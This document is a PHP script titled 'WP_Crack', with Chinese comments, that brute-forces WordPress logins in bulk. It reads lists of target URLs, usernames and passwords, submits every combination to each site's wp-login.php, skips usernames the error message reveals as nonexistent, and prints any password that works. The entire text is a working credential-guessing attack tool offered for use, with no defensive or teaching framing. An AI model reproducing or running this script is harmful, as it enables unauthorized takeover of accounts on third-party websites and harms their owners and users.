<?php $HostList = file('url.txt'); $users = file('users.txt'); $Psws = file('pass.txt'); foreach ($HostList as $url) { $url = Trim($url); $PostUrl = $url.'/wp-login.php'; $_Path_status_code = GetHttpStatusCode(Trim($PostUrl)); //echo $PostUrl.' '.$_Path_status_code."\n"; if ('404' == $_Path_status_code) { Continue; } foreach ($users as $username) { $username = Trim($username); foreach ($Psws as $now) { $now = Trim($now); $curlPost = 'log='.$username.'&pwd='.urlencode($now); $Rs = POST_Data($PostUrl, $curlPost); $fail_tag = '<strong>'.$username.'</strong>'; if (stristr($Rs, '<strong>ERROR</strong>: Invalid username')) # 不存在的用户名跳过猜解 { Break; } if (!stristr($Rs, $fail_tag)) { echo $PostUrl.' '.'Password:'.$now.' # Succed!'."\n"; } } } } function GetHttpStatusCode($url){ $curl = curl_init(); curl_setopt($curl,CURLOPT_URL,$url);//获取内容url curl_setopt($curl,CURLOPT_HEADER,1);//获取http头信息 curl_setopt($curl,CURLOPT_NOBODY,1);//不返回html的body信息 curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);//返回数据流,不直接输出 curl_setopt($curl,CURLOPT_TIMEOUT,3); //超时时长,单位秒 curl_exec($curl); $rtn= curl_getinfo($curl,CURLINFO_HTTP_CODE); curl_close($curl); return $rtn; } function POST_Data($PostUrl, $DATA) { $ch = curl_init();//初始化curl curl_setopt($ch,CURLOPT_URL, $PostUrl);//抓取指定网页 curl_setopt($ch, CURLOPT_HEADER, 0);//设置header curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//要求结果为字符串且输出到屏幕上 curl_setopt($ch, CURLOPT_POST, 1);//post提交方式 curl_setopt($ch, CURLOPT_POSTFIELDS, $DATA); $data = curl_exec($ch);//运行curl curl_close($ch); return $data;//输出结果 } ?>
WP_Crack(批量爆破Wordpress 账户)